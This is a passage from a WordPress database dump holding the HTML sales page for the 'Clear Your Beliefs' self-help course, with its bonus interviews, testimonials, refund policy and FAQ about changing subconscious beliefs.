addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'open', 'open', '', '1941-revision-v1', '', '', '2015-04-14 12:10:35', '2015-04-14 17:10:35', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2083, 2, '2015-02-06 01:51:04', '2015-02-06 06:51:04', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was 